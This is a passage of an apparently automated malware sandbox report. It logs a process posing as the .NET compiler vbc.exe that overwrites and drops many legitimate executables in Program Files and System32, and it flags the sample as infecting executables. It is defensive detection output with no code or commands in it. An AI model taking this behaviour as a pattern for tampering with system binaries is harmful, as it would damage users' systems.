                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
